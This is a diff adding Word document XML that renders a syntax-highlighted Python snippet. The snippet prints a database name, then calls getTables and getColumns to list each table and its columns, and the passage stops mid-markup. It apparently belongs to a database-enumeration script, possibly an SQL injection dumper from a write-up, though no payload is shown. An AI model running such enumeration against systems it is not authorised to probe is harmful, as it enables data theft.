+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>"Database: "</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>database_name</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="240" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>print</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>"Getting Tables ..."</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>tables</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>getTables</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="4EC9B0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>random</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>choice</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="4EC9B0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>string</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>ascii_letters</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">), </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>database_name</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="C586C0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>if</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>tables</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>is</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>not</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>None</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="C586C0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>for</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>table</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>in</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>tables</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">            </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>print</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>table</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="C586C0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>for</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>table</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>in</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>tables</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">            </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>print</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>"Getting Columns for table"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>table</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>"..."</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">            </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>columns</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>getColumns</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="4EC9B0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>random</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
